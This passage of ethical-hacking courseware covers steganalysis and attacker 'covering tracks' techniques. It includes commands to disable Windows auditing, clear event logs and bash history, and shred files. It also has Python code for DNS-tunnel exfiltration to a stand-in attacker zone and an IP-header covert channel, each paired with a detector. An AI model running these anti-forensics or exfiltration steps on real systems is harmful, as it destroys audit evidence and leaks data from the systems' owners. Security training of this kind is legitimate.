This attack allows the attacker to know the steganography algorithm as well as the original and stego-object. The attacker can extract the hidden information with the information at hand.
• Known-message attack
The known-message attack presumes that the message and the stego-medium are available. Using this attack, one can detect the technique used to hide the message.
• Known-cover attack
Attackers use the known-cover attack when they know both the stego-object and the original cover medium. This will enable a comparison between both mediums to detect changes in the format of the medium and find the hidden message.
• Chosen-message attack
The steganalyst uses a known message to generate a stego-object by using various steganography tools to find the steganography algorithm used to hide the information. The goal in this attack is to determine patterns in the stego-object that may point to the use of specific steganography tools or algorithms.
• Chosen-stego attack
The chosen-stego attack takes place when the steganalyst knows both the stego-object and the steganography tool or algorithm used to hide the message.
• Chi-square attack
The chi-square method is based on probability analysis to test whether a given stego-object and the original data are the same or not. If the difference between both is nearly zero, then no data are embedded; otherwise, the stego-object includes embedded data inside.
• Distinguishing statistical attack
In the distinguishing statistical method, the steganalyst or attacker analyzes the embedding algorithm used to detect distinguishing statistical changes, along with the length of the embedded data.
• Blind classifier attack
In the blind classifier method, a blind detector is fed with the original or unmodified data to learn the appearance of the original data from multiple perspectives. The output of the blind detector is used to train the classifier to detect differences between the stego-object and the original data.
Detecting Steganography (Text, Image, Audio, and Video Files)
Steganography is the art of hiding either confidential or sensitive information within a cover medium. In this method, the unused bits of data in computer files such as graphics, digital images, text, and HTML help in hiding sensitive information from unauthorized users. Detection of the hidden data involves different approaches depending on the file type used. The following file types require specific methods to detect hidden messages.
Text File
For text files, alterations are made to the character positions to hide the data. One can detect these alterations by looking for text patterns or disturbances, the language used, line height, or an unusual number of blank spaces. A simple word processor can sometimes reveal text steganography as it displays the spaces, tabs, and other characters that distort the text's presentation during text steganography. Text steganography can be detected by taking a closer look at the following aspects:
o Unusual patterns in the stego-object
o Appended extra spaces and invisible characters
Image File
The information hidden in an image can be detected by determining changes in size, file format, last modified timestamp, and color palette of the file. The following points can help you in detecting image steganography:
o Several display distortions in images
o Sometimes images may become grossly degraded
o Detection of anomalies through evaluating too many original images and stego-images concerning luminance, color composition, pixel relationships, etc.
o Exaggerated "noise"
Statistical analysis methods help to scan an image for steganography. Whenever you insert a secret message into an image, the LSBs are no longer random. With encrypted data that has high entropy, the LSB of the cover will not contain information about the original and is more or less random. By using statistical analysis on the LSB, you can identify the difference between random values and real values.
Audio File
Audio steganography is a process of embedding confidential information such as private documents and files in digital sound. Statistical analysis methods can be used to detect audio steganography as it involves LSB modifications. The inaudible frequencies can be scanned for hidden information. The odd distortions and patterns show the existence of secret data.
Video File
Detection of secret data in video files includes a combination of the methods used in image and audio files. Special code signs and gestures help in detecting secret data.
Both audio and video steganography are quite difficult to detect, compared to other types such as image and document. Moreover, it is extremely hard to detect good steganography of any type. However, careful analysis of audio and video signals for hidden information may increase the chances of detecting it correctly.
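The chi-square attack listed under the steganalysis methods and the "LSBs are no longer random" statistical test described for image and audio files both rest on the same pairs-of-values statistic. The Python below is an added example written for this edit, not code from the courseware or from any tool it names: it counts how often each pair of sample values (2k, 2k+1) occurs, computes the chi-square statistic against the hypothesis that the two members of every pair are equally frequent, and shows how a constructed cover and the same data after its LSBs are overwritten with random bits land on opposite sides of the threshold. The cover generator, the seeds and the cut-off of twice the degrees of freedom are assumptions made for the demonstration.

```python
import random
from typing import List, Sequence

DEGREES_OF_FREEDOM = 127          # 128 pairs of values: (0,1), (2,3), ..., (254,255)
CUTOFF = 2 * DEGREES_OF_FREEDOM   # coarse decision threshold (assumption, not from the text)


def pov_chi_square(samples: Sequence[int]) -> float:
    """Pairs-of-values chi-square statistic over 8-bit samples (pixel bytes or PCM bytes).

    When the LSBs have been overwritten with random (e.g. encrypted) bits, the
    counts of 2k and 2k+1 drift toward equality and the statistic becomes small,
    close to the number of degrees of freedom. Natural cover data usually keeps
    the two counts of each pair unequal, giving a much larger value.
    """
    counts = [0] * 256
    for v in samples:
        counts[v] += 1
    chi = 0.0
    for k in range(128):
        even, odd = counts[2 * k], counts[2 * k + 1]
        expected = (even + odd) / 2.0
        if expected > 0:
            chi += (even - expected) ** 2 / expected
    return chi


def lsb_embedding_suspected(samples: Sequence[int]) -> bool:
    """Flag the sample set when its value pairs are too equal to be natural."""
    return pov_chi_square(samples) < CUTOFF


def make_cover(n: int, seed: int = 1) -> List[int]:
    """Constructed cover data (not a real image): a bell-shaped histogram in which
    even values are deliberately more common than their odd neighbours, as a
    coarsely quantised sensor would produce."""
    rng = random.Random(seed)
    out = []
    for _ in range(n):
        v = max(0, min(255, int(rng.gauss(128, 30))))
        if v % 2 == 1 and rng.random() < 0.7:
            v -= 1
        out.append(v)
    return out


def replace_lsb_with_random_bits(samples: Sequence[int], seed: int = 2) -> List[int]:
    """Simulated stego object for testing the detector: every LSB replaced by a
    random bit, which is what a high-entropy payload looks like to the statistic."""
    rng = random.Random(seed)
    return [(v & 0xFE) | rng.getrandbits(1) for v in samples]


def demo(n: int = 20000) -> dict:
    cover = make_cover(n)
    stego = replace_lsb_with_random_bits(cover)
    return {
        "cover_chi": pov_chi_square(cover),
        "stego_chi": pov_chi_square(stego),
        "cover_flagged": lsb_embedding_suspected(cover),
        "stego_flagged": lsb_embedding_suspected(stego),
    }


if __name__ == "__main__":
    print(demo())
```

The caveat a practitioner should keep in mind: a cover whose pairs are naturally balanced (heavily dithered or already noisy data) produces a small statistic without any embedding, and a payload that fills only part of the file lowers the statistic only for the region it occupies, which is why the test is normally run over sliding windows of the data rather than the whole file at once.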
Steganography Detection Tools
Steganography detection tools allow you to detect and recover hidden information in digital media, such as audio, images, and video.
• zsteg
Source: https://github.com
The zsteg tool is used to detect stegano-hidden data in PNG and BMP image files. As shown in the screenshot, you can use the zsteg tool to detect the hidden secret message in the image file.
Figure 6.148: Screenshot of zsteg
Some examples of steganography detection tools are as follows:
• StegoVeritas (https://github.com)
• stegextract (https://github.com)
• StegoHunt™ (https://www.wetstonetech.com)
• Steganography Studio (http://stegstudio.sourceforge.net)
• Virtual Steganographic Laboratory (VSL) (http://vsl.sourceforge.net)
Module Flow: System Hacking Concepts, Gaining Access, Escalating Privileges, Maintaining Access, Clearing Logs
In the previous section, we saw how an attacker can hide malicious files on a target computer using various steganographic techniques, NTFS streams, and other techniques to maintain future access to the target. Once the attacker has succeeded in performing this malicious operation, the next step involves removing any resultant traces/tracks in the system.
Covering Tracks
Covering tracks is one of the main stages during system hacking. In this stage, the attacker tries to hide and avoid being detected or "traced out" by covering all "tracks," or logs, generated while accessing the target network or computer. We now look at how the attacker removes traces of an attack on a target computer.
Erasing evidence is a must for any attacker who would like to remain obscure. It is a method used to evade a traceback. It starts with erasing the contaminated logs and possible error messages generated in the attack process. The attacker makes changes to the system configuration such that it does not log the future activities. By manipulating and tweaking event logs, the attacker tricks the system administrator into believing that there is no malicious activity in the system and that no intrusion or compromise has taken place.
Because the first thing a system administrator does when monitoring unusual activity is check the system log files, it is common for intruders to use a tool to modify these logs. In some cases, rootkits can disable and discard all existing logs. Attackers remove only those portions of logs that can reveal their presence if they intend to use the system for a long period as a launch base for future exploitations.
Attackers must make the system appear as it did before access was gained and a backdoor was established. This allows them to change any file attributes back to their original state. The information listed, such as file size and date, is just attribute information contained in the file.
Protection against attackers trying to cover their tracks by changing file information can be difficult. However, it is possible to detect whether an attacker has done so by calculating the file's cryptographic hash. This type of hash is a calculation of the entire file before encryption.
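The paragraph above makes the defender's point: size and date are attributes stored alongside a file and can be set back, but a hash of the full content cannot be restored without restoring the content. The following Python is an added example for this edit (not the courseware's code or any named tool's) of a minimal integrity baseline: it records a SHA-256 hash together with the size and modification time of every file under a directory, then reports files whose content changed even though their attributes still match the baseline. The directory layout, file contents and names are constructed for the demonstration.

```python
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Dict


def sha256_file(path: Path) -> str:
    """Hash the entire file content in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> Dict[str, dict]:
    """Record the content hash plus the attributes an intruder can reset (size, mtime)."""
    baseline: Dict[str, dict] = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            st = p.stat()
            baseline[p.relative_to(root).as_posix()] = {
                "sha256": sha256_file(p),
                "size": st.st_size,
                "mtime_ns": st.st_mtime_ns,
            }
    return baseline


def compare_baseline(root: Path, baseline: Dict[str, dict]) -> Dict[str, list]:
    """Return modified, added and missing files relative to the baseline.

    Each 'modified' entry is (relative path, attributes_unchanged). True means
    size and mtime still match the baseline although the content hash does not,
    which is exactly the 'attributes put back to their original state' case the
    text describes and the reason a content hash is needed at all.
    """
    current = build_baseline(root)
    report: Dict[str, list] = {"modified": [], "added": [], "missing": []}
    for rel, old in baseline.items():
        new = current.get(rel)
        if new is None:
            report["missing"].append(rel)
        elif new["sha256"] != old["sha256"]:
            attrs_unchanged = (new["size"] == old["size"]
                               and new["mtime_ns"] == old["mtime_ns"])
            report["modified"].append((rel, attrs_unchanged))
    report["added"] = [rel for rel in current if rel not in baseline]
    return report


def demo() -> Dict[str, list]:
    """Constructed scenario in a temporary directory: baseline a tiny tree, then
    change one file's content without changing its length, restore its timestamp,
    delete a second file and add a new one."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "etc").mkdir()
        cfg = root / "etc" / "service.cfg"
        cfg.write_text("listen=443\nlog=on\n")
        (root / "etc" / "hosts").write_text("127.0.0.1 localhost\n")
        baseline = build_baseline(root)

        st = cfg.stat()
        cfg.write_text("listen=443\nlog=of\n")              # same byte length as before
        os.utime(cfg, ns=(st.st_atime_ns, st.st_mtime_ns))  # timestamp put back
        (root / "etc" / "hosts").unlink()
        (root / "etc" / "extra.cfg").write_text("x")
        return compare_baseline(root, baseline)


if __name__ == "__main__":
    print(demo())
```

In practice the baseline itself must be stored off the monitored host (or signed), since an intruder with administrative access could otherwise rewrite it along with the files it describes.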
Attackers may not wish to delete an entire log to cover their tracks, as doing so may require admin privileges. If attackers can delete only the attack event logs, they will still be able to escape detection. The attacker can manipulate log files with the help of:
• SECEVENT.EVT (security): failed logins, accessing files without privileges
• SYSEVENT.EVT (system): driver failure, things not operating correctly
• APPEVENT.EVT (applications)
Techniques Used for Covering Tracks
The main activities that an attacker performs toward removing his/her traces on a computer are as follows:
• Disabling Auditing: An attacker disables the auditing features of the target system.
• Clearing Logs: An attacker clears/deletes the system log entries corresponding to his/her activities.
• Manipulating Logs: An attacker manipulates logs in such a way that he/she will not be caught in legal action.
• Covering Tracks on the Network: An attacker uses techniques such as reverse HTTP shells, reverse ICMP tunnels, DNS tunneling, and TCP parameters to cover tracks on the network.
• Covering Tracks on the OS: An attacker uses NTFS streams to hide and cover malicious files in the target system.
• Deleting Files: An attacker uses a command-line tool such as Cipher.exe to delete the data and prevent recovery of that data in future.
• Disabling Windows Functionality: An attacker disables Windows functionality such as last access timestamp, hibernation, virtual memory, system restore points, etc. to cover tracks.
Thus, the complete job of an attacker involves not only compromising the system successfully, but also disabling logging, clearing log files, eliminating evidence, planting additional tools, and covering his/her tracks.
Disabling Auditing: Auditpol
Source: https://docs.microsoft.com
One of the first steps for an attacker who has command-line capability is to determine the auditing status of the target system, locate sensitive files (such as password files), and implant automatic information-gathering tools (such as a keystroke logger or network sniffer).
Windows records certain events to the event log (or associated syslog). The log can be set to send alerts (email, SMS, etc.) to the system administrator. Therefore, the attacker will want to know the auditing status of the system he/she is trying to compromise before proceeding with his/her plans.
Auditpol.exe is the command-line utility tool to change audit security settings at the category and sub-category levels. Attackers can use AuditPol to enable or disable security auditing on local or remote systems, and to adjust the audit criteria for different categories of security events.
The moment intruders gain administrative privileges, they disable auditing with the help of auditpol.exe. Once they complete their mission, they again turn on auditing using the same tool.
After gaining access and establishing shell access with the target system, attackers use the following commands to enable/disable system auditing logs:
Enabling system auditing:
C:\>auditpol /set /category:"system","account logon" /success:enable /failure:enable
Disabling system auditing:
C:\>auditpol /set /category:"system","account logon" /success:disable /failure:disable
This will make changes in the various logs that might register the attacker's actions. He/she can choose to hide the registry keys changed later on.
Attackers can use AuditPol to view the defined auditing settings on the target computer by running the following command at the command prompt:
auditpol /get /category:*
Screenshots of the output by Auditpol are as follows:
Figure 6.149: Screenshot showing the output of Auditpol disabling audit
Figure 6.150: Screenshot showing the output of Auditpol enabling audit
Clearing Logs
Clear_Event_Viewer_Logs.bat is a utility that can be used to wipe out the logs of the target system. This utility can be run through the command prompt, PowerShell, and using a BAT file to delete security, system, and application logs. Attackers might use this utility to wipe out the logs as one method of covering their tracks on the target system.
Steps to clear logs using the Clear_Event_Viewer_Logs.bat utility are as follows.
1. Download the Clear_Event_Viewer_Logs.bat utility from https://www.tenforums.com.
2. Unblock the .bat file.
3. Right-click or press and hold on the .bat file and click/tap on Run as administrator.
4. If prompted by UAC, click/tap on Yes.
5. A command prompt will now open to clear the event logs. The command prompt will automatically close when finished.
Figure 6.151: Screenshot of clearing logs using the Clear_Event_Viewer_Logs.bat file
Steps to clear logs using the Meterpreter shell are as follows.
If the system is exploited with Metasploit, the attacker uses a Meterpreter shell to wipe out all the logs from a Windows system:
1. Launch the meterpreter shell prompt from the Metasploit Framework.
2. Type the clearev command in the Meterpreter shell prompt and press Enter. The logs of the target system will start being wiped out.
Figure 6.152: Screenshot of Meterpreter
Steps to clear logs using the PowerShell command are as follows.
Clear-EventLog
Source: https://docs.microsoft.com
Using the Clear-EventLog command, the attacker can clear all the PowerShell event logs from local or remote computers:
1. Launch Windows PowerShell with administrator privileges.
2. Use the following command to clear the entries from the PowerShell event log on the local or remote system:
>Clear-EventLog "Windows PowerShell"
Use the following command to clear specific multiple log types from local or remote systems:
>Clear-EventLog -LogName ODiag, OSession -ComputerName localhost, Server02
(This command clears all the log entries in Microsoft Office Diagnostics (ODiag) and Microsoft Office Sessions (OSession) on the local computer and the Server02 remote computer.)
Use the following command to clear all the logs on the specified systems, and then display the event log list:
>Clear-EventLog -LogName application, system -confirm
Note: The parameters used in the Clear-EventLog command are as follows:
• -ComputerName: Specifies a remote computer; the default is the local computer
• -Confirm: Prompts you for confirmation before running the cmdlet
• -LogName: Specifies the event logs
• -WhatIf: Shows what will happen if the cmdlet runs
Steps to clear event logs using the wevtutil utility are as follows.
1. Launch the command prompt with administrator privileges.
2. Use the following command to display a list of event logs:
>wevtutil el
3. Use the following command to clear the event logs:
>wevtutil cl <log_name>
Log_name: name of the log to clear, e.g. system, application, security
As shown in the screenshot, the attacker can view the list of event logs using the wevtutil utility and clear the system, application, and security event logs.
Figure 6.153: Screenshot of clearing logs using the wevtutil utility
Manually Clearing Event Logs
Once attackers gain administrative access to a target system, they can manually wipe out the log entries corresponding to their activities on both Windows and Linux computers. The steps to clear event logs on Windows and Linux OSs are as follows:
For Windows
• Navigate to Start > Control Panel > System and Security > Administrative Tools > double-click Event Viewer
• Delete all the log entries logged while compromising the system
Figure 6.154: Clearing event logs for Windows
For Linux
• Navigate to the /var/log directory on the Linux system
• Open the plain text file /var/log/messages, containing the log messages, with a text editor
• Delete all the log entries logged while compromising the system
Figure 6.155: Clearing event logs for Linux
Ways to Clear Online Tracks
Attackers can clear online tracks maintained using web history, logs, cookies, cache, downloads, visited time, etc. on the target computer so that the victims cannot notice what online activities the attackers have performed.
What can attackers do to clear their online tracks?
• Use private browsing
• Delete history
• Disable stored history
• Delete private data
• Clear cookies on exit
• Clear cache on exit
• Delete downloads
• Disable password manager
• Clear data in the password manager
• Delete saved sessions
• Delete user JavaScript
• Set up multiple users
• Delete history in the address field
• Remove Most Recently Used (MRU)
• Clear toolbar data from browsers
• Turn off AutoComplete
To clear the online tracks of various activities, attackers should follow different paths for different OSs. The steps to clear online tracks from the Privacy Settings or from the Windows registry (Windows 10) are as follows:
• From the Privacy Settings in Windows 10
o Right-click on the Start button, choose Settings, and click on Personalization
o In Personalization, click Start from the left pane and turn off both "Show most used apps" and "Show recently opened items in Jump Lists on Start or the taskbar"
• From the Registry in Windows 10
o Open the Registry Editor, navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer, and then remove the key for "RecentDocs"
o Delete all the values except "(Default)"
Covering BASH Shell Tracks
Bourne Again Shell, or Bash, is an sh-compatible shell that stores command history in a file called the bash history. You can view the saved command history using the more ~/.bash_history command.
This feature of Bash is a problem for hackers, as investigators could use the bash_history file to track the origin of an attack and the exact commands used by an intruder to compromise a system.
Attackers use the following commands to clear the saved command history tracks:
• Disabling history
export HISTSIZE=0
This command disables the Bash shell from saving history. HISTSIZE determines the number of commands to be saved, which is set to 0. After executing this command, attackers lose their privilege to review the previously used commands.
• Clearing the history
history -c
This command is useful in clearing the stored history. It is an effective alternative to disabling the history command as, with this command, an attacker has the convenience of rewriting or reviewing the earlier used commands.
history -w
This command only deletes the history of the current shell, whereas the command history of other shells remains unaffected.
• Clearing the user's complete history
cat /dev/null > ~/.bash_history && history -c && exit
This command deletes the complete command history of the current and all other shells and exits the shell.
• Shredding the history
shred ~/.bash_history
This command shreds the history file and renders its contents unreadable. It is useful when an investigator locates the file but, owing to this command, becomes unable to read any content in the history file.
shred ~/.bash_history && cat /dev/null > ~/.bash_history && history -c && exit
This command first shreds the history file, then deletes the file, and finally clears all the evidence of its usage.
Figure 6.156: Covering Bash shell tracks
Covering Tracks on a Network
Using Reverse HTTP Shells
An attacker starts this attack by infecting a victim's machine with malicious code that installs a reverse HTTP shell on the victim's system. The reverse HTTP shell is programmed to ask an external master, which controls it, for commands at regular intervals. Because the victim's machine initiates the connections outbound over HTTP, this type of traffic is considered normal by an organization's network perimeter controls such as the DMZ and firewall. Once the attacker types a command on the master system, the command is retrieved and executed on the victim's system. The victim here acts as a web client issuing HTTP GET requests, whereas the attacker behaves like a web server and responds to the requests. Once the previous command has executed, the results are sent back in the next web request. All other users in the network access the Internet in the same way; therefore, the traffic between the attacker and the victim is seen as normal.
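What gives the polling away is its regularity rather than its content. The following is an added example, not part of the courseware: a beacon detector run over constructed proxy log lines (the log format of timestamp, client, method, host and path, the host names, and the thresholds are all assumptions), which flags a client that contacts the same host at a nearly constant interval while ordinary browsing from another client is left alone.

```python
"""Beacon detection over web proxy logs."""
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed log: 10.1.1.20 browses normally, 10.1.1.50 polls every 60 s.
PROXY_LOG = """\
2024-03-01T09:00:00 10.1.1.20 GET www.news.example /index.html
2024-03-01T09:00:00 10.1.1.50 GET cdn.update.example /check
2024-03-01T09:00:07 10.1.1.20 GET www.news.example /sports
2024-03-01T09:01:00 10.1.1.50 GET cdn.update.example /check
2024-03-01T09:02:00 10.1.1.50 GET cdn.update.example /check
2024-03-01T09:02:41 10.1.1.20 GET shop.example /cart
2024-03-01T09:03:00 10.1.1.50 GET cdn.update.example /check
2024-03-01T09:04:00 10.1.1.50 GET cdn.update.example /check
2024-03-01T09:05:00 10.1.1.50 GET cdn.update.example /check
2024-03-01T09:09:12 10.1.1.20 GET www.news.example /weather
"""


def parse_log(log: str):
    """Yield (timestamp, client, host) for each line of the assumed format."""
    for line in log.splitlines():
        ts, client, _method, host, _path = line.split()
        yield datetime.fromisoformat(ts), client, host


def find_beacons(log: str, min_requests: int = 5, max_jitter: float = 0.2) -> list:
    """Group requests per (client, host) and flag pairs whose inter-request
    gaps are regular: coefficient of variation of the gaps <= max_jitter."""
    times = defaultdict(list)
    for ts, client, host in parse_log(log):
        times[(client, host)].append(ts)
    beacons = []
    for (client, host), stamps in times.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean == 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_jitter:
            beacons.append({"client": client, "host": host,
                            "interval_s": mean, "requests": len(stamps)})
    return beacons

if __name__ == "__main__":
    print(find_beacons(PROXY_LOG))
```

Real implants add random sleep between polls, so in practice the window is hours rather than minutes and max_jitter is tuned against the distribution of gaps instead of a single coefficient; the point is that the regularity survives even when every individual request passes the perimeter as ordinary HTTP.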
Using Reverse ICMP Tunnels
Internet Control Message Protocol (ICMP) tunneling is a technique in which an attacker uses ICMP echo request and echo reply packets as carriers of a TCP payload to stealthily access or control a system. This method can be used to bypass firewall rules easily, because many organizations have security mechanisms that inspect incoming ICMP packets but not outgoing ones, and that pass echo traffic without examining its data field.
An attacker first configures the local client to connect with the victim. The victim's system is triggered to encapsulate a TCP payload in an ICMP echo packet, which is forwarded to the proxy server. The proxy server de-encapsulates and extracts the TCP payload and then sends it to the attacker.

Using DNS Tunneling
Attackers can use DNS tunneling to encode malicious content or the data of other programs within DNS queries and replies. The data payload is carried in the names being queried, usually for a domain whose authoritative name server the attacker controls; the victim's own DNS server forwards those queries to it, which creates a back channel between the compromised host and the attacker's remote server and applications. Attackers can employ this back channel to exfiltrate stolen, confidential, or sensitive information from the server.
Attackers perform DNS tunneling in stages. First, they compromise an internal system to create a connection with an external network. Then, they use that compromised system as a command-and-control channel to access the system remotely and transfer files covertly from inside the network to the outside.
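Both ends of the channel just described, plus the check a defender runs on the resolver log, as an added example that is not part of the courseware. tunnel.example stands in for an attacker-controlled zone whose authoritative server is the tunnel endpoint; the benign query names, the exfiltrated message, and the detection thresholds are constructed for the example.

```python
"""DNS tunnelling: packing data into query names, and spotting it in a log."""
import base64
from collections import defaultdict

TUNNEL_DOMAIN = "tunnel.example"   # assumed attacker-controlled zone
MAX_LABEL = 63                     # DNS label length limit (RFC 1035)
CHUNK = 2 * MAX_LABEL              # payload characters carried per query


def encode_queries(data: bytes, session: str = "s1") -> list:
    """Sender side. Base32 keeps the payload inside the hostname alphabet;
    each query carries up to two 63-character labels plus a sequence number,
    so the whole name stays under the 253-character limit."""
    text = base64.b32encode(data).decode().rstrip("=").lower()
    queries = []
    for seq, i in enumerate(range(0, len(text), CHUNK)):
        piece = text[i:i + CHUNK]
        labels = [piece[j:j + MAX_LABEL] for j in range(0, len(piece), MAX_LABEL)]
        queries.append(".".join(labels) + f".{seq:04d}.{session}.{TUNNEL_DOMAIN}")
    return queries


def decode_queries(queries) -> bytes:
    """What the attacker's authoritative server does: reassemble by sequence
    number, because recursive resolvers may deliver queries out of order."""
    suffix = "." + TUNNEL_DOMAIN
    pieces = {}
    for name in queries:
        if not name.endswith(suffix):
            continue
        labels = name[:-len(suffix)].split(".")
        pieces[int(labels[-2])] = "".join(labels[:-2])
    text = "".join(pieces[k] for k in sorted(pieces)).upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def suspicious_zones(queries, min_unique: int = 3, min_avg_prefix: int = 30) -> dict:
    """Defender side, over a resolver log: a zone that receives many distinct
    names with long prefixes is a tunnel candidate, whatever the zone is
    called. Returns the flagged zones with their statistics."""
    by_zone = defaultdict(set)
    for name in queries:
        labels = name.lower().strip(".").split(".")
        if len(labels) < 3:
            continue
        zone = ".".join(labels[-2:])
        by_zone[zone].add(".".join(labels[:-2]))
    flagged = {}
    for zone, prefixes in by_zone.items():
        avg = sum(len(p) for p in prefixes) / len(prefixes)
        if len(prefixes) >= min_unique and avg >= min_avg_prefix:
            flagged[zone] = {"unique_names": len(prefixes), "avg_prefix_len": round(avg, 1)}
    return flagged


# Constructed resolver log entries and a constructed message to exfiltrate.
BENIGN_QUERIES = ["www.example.com", "mail.google.com", "update.microsoft.com",
                  "login.microsoft.com", "www.example.com"]
SECRET = b"card=4111111111111111;exp=12/27;cvv=123\n" * 4

if __name__ == "__main__":
    tunnel = encode_queries(SECRET)
    print(tunnel[0])
    print(decode_queries(tunnel) == SECRET)
    print(suspicious_zones(BENIGN_QUERIES + tunnel))
```

The detector keys on volume and shape rather than on the zone name, which is the only signal that survives the attacker changing domains; the unique-name count matters because tunnels must defeat resolver caching with ever-changing names, while legitimate services reuse a handful of hostnames.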
Using TCP Parameters
TCP/IP header parameters can be used by the attacker to distribute a payload and to create covert channels. Some of the header fields in which data can be hidden are as follows:
- IP Identification Field: This is an easy approach in which a payload is transferred over an established session between two systems one character at a time: one character is encapsulated per packet in the 16-bit identification field.
- TCP Acknowledgement Number: This approach is more involved, as it uses a bounce server that receives packets from the victim and sends them to the attacker. Here, one hidden character is relayed by the bounce server per packet.
- TCP Initial Sequence Number: This method also does not require an established connection between the two systems. Here, one hidden character is encapsulated per SYN request and reset packet.
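The IP Identification variant in working form, as an added example that is not from the courseware. It builds minimal IPv4 headers with the struct module (no raw sockets, so it runs anywhere without privileges), reads the character back the way a receiver on the path would, and shows the statistical check a network monitor can apply. The addresses and the message are constructed; real operating systems fill the field with incrementing or random values, which is what the check relies on.

```python
"""Covert channel in the IPv4 Identification field: one character per packet."""
import struct

SRC, DST = "10.0.0.5", "203.0.113.9"   # constructed endpoints


def _ip(addr: str) -> bytes:
    return bytes(int(octet) for octet in addr.split("."))


def checksum(data: bytes) -> int:
    """Ones'-complement sum over 16-bit words, as used by the IPv4 header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_ipv4_header(ident: int, src: str = SRC, dst: str = DST, proto: int = 6) -> bytes:
    """20-byte IPv4 header with no options, DF set, and the checksum filled in."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20, ident & 0xFFFF, 0x4000,
                      64, proto, 0, _ip(src), _ip(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def parse_ipv4_header(pkt: bytes):
    """Return (identification, checksum_ok)."""
    fields = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    return fields[3], checksum(pkt[:20]) == 0


def encode_message(msg: bytes) -> list:
    """Sender: the character goes into the high byte of the 16-bit ID field."""
    return [build_ipv4_header(ident=ch << 8) for ch in msg]


def decode_message(packets) -> bytes:
    """Receiver: read the ID field back from each packet in arrival order."""
    out = bytearray()
    for pkt in packets:
        ident, ok = parse_ipv4_header(pkt)
        if ok:
            out.append(ident >> 8)
    return bytes(out)


def looks_like_id_channel(packets, min_packets: int = 8) -> bool:
    """Monitor's check: a flow whose ID values all decode to printable ASCII
    and share the same low byte does not look like any real IP stack."""
    idents = [parse_ipv4_header(p)[0] for p in packets]
    if len(idents) < min_packets:
        return False
    printable = sum(32 <= (i >> 8) < 127 for i in idents)
    same_low_byte = len({i & 0xFF for i in idents}) == 1
    return same_low_byte and printable / len(idents) > 0.9

if __name__ == "__main__":
    pkts = encode_message(b"id channel test")
    print(decode_message(pkts), looks_like_id_channel(pkts))
```

A stealthier sender would randomize the low byte and spread characters over more than one field, which defeats this particular check; what does not go away is that the field values stop being independent of the payload, so a monitor that compares the ID sequence against the host's normal behaviour still has something to work with.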
Covering Tracks on an OS
Windows
NTFS has a feature called alternate data streams (ADS) that allows attackers to hide a file behind another normal file. The steps to hide files using NTFS streams are as follows:
- Open the command prompt with elevated privileges.
- Type the following command (here, C: is the drive where the file is kept; the SecretFile.txt file is hidden inside the LegitFile.txt file):
  type C:\SecretFile.txt > C:\LegitFile.txt:SecretFile.txt
- To view the hidden file, type the following (for this, you need to know the hidden stream name):
  more < C:\LegitFile.txt:SecretFile.txt
The hidden stream does not change the size that a plain dir reports for LegitFile.txt, but dir /r lists every alternate stream, so an investigator who looks for them finds the hidden file easily.

Figure 6.157: Covering tracks on Windows OS
UNIX
Files in UNIX can be hidden just by prepending a dot (.) to the file name. In UNIX, each directory contains two special entries: the current directory (.) and the parent directory (..). Attackers give their hidden files similar names, such as ". " (a dot followed by a space), and usually place them in /tmp, /dev, or /etc, where an extra dotted entry does not stand out. A plain ls does not show such names; ls -la does, and find / -name ".*" -type f lists every dotted file on the system.
An attacker can also edit the log files to cover their tracks. However, when hiding files this way, an attacker can still leave a trace behind, because the command used to create or open the file will be recorded in the .bash_history file. A smart attacker knows how to overcome this problem and does so by using the export HISTSIZE=0 command.

Figure 6.158: Covering tracks on UNIX OS
Delete Files using Cipher.exe
Cipher.exe is a built-in Windows command-line tool that can be used to securely delete data by overwriting it to prevent recovery in the future. The same command also encrypts and decrypts data on NTFS partitions (EFS).
When an attacker creates and encrypts a malicious text file, a backup file is created during the encryption process, so that the data can be recovered if the encryption is interrupted. After the encryption process completes, the backup file is deleted, but this deleted file can be recovered using data-recovery software and can then be used by security personnel for investigation.
To avoid data recovery and cover their tracks, attackers use the Cipher.exe tool to overwrite the free space that such deleted files occupied, first with all zeroes (0x00), then with all 255s (0xFF), and finally with random data. Note that cipher /w wipes only deallocated space: it does not touch files that still exist, and the directory given on the command line merely identifies the volume whose free space is wiped.
The attacker can delete files using Cipher.exe by implementing the following steps:
- Launch the command prompt with administrator privileges.
- Use the following command to overwrite the free space on the volume that holds a specific folder:
  cipher /w:<drive letter>:\<folder name>
- Use the following command to overwrite the free space of the given drive:
  cipher /w:<drive letter>:

Figure 6.159: Screenshot of the cipher.exe command
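The operation behind both shred (in the Bash section above) and cipher /w, as an added example that is the code of neither tool: overwrite a file in place with zeros, then 0xFF, then random bytes, in the order cipher /w uses, sync after each pass, and unlink it under a random name as shred -u does. The test file is created on the spot. The comment on the file-system caveat is the part a practitioner should take away: the overwrite only reaches the blocks the file system hands back, so copy-on-write, journaling, snapshots, and SSD wear leveling can all leave earlier copies behind.

```python
"""Multi-pass overwrite before deletion."""
import os
import secrets
import tempfile

DEFAULT_PASSES = (b"\x00", b"\xff", None)   # None means random bytes

# Caveat: in-place overwrite assumes the file system writes new data over the
# old blocks. Journaling (ext4 data=journal), copy-on-write (btrfs, ZFS, APFS),
# volume snapshots, and SSD wear leveling all break that assumption, which is
# why shred's own documentation warns about it and why full-disk encryption
# with key destruction is the reliable alternative.


def overwrite_file(path: str, passes=DEFAULT_PASSES, block: int = 4096) -> int:
    """Overwrite every byte of `path` once per pass, syncing after each pass.
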